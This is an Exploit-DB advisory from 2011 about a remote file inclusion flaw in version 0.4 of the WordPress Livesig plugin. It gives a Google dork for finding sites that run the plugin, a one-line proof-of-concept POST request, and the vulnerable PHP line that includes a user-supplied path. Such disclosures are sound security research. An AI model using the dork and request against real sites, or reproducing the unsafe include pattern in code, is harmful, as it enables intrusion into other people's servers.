WordPress Livesig Plugin 0.4 - Remote File Inclusion

2011-09-19T00:00:00
ID EDB-ID:17864
Type exploitdb
Reporter Ben Schmidt
Modified 2011-09-19T00:00:00

Description

Wordpress Livesig Plugin 0.4 - Remote File Inclusion. Webapps exploit for php platform

                                        
                                            # Exploit Title: Livesig Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/livesig
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/livesig/download/
# Version: 0.4 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/livesig/livesig-ajax-backend.php POST="wp-root=RFI&action=asdf"

---
Vulnerable Code
---
// Exit if no function specified
if( !isset( $_POST['action'] ) || '' == $_POST['action'] ) {
        echo '{ errcode: "ERR-000", errmsg: "No action specified" }';
        exit();
}

include( $_POST['wp-root'] . 'wp-config.php' );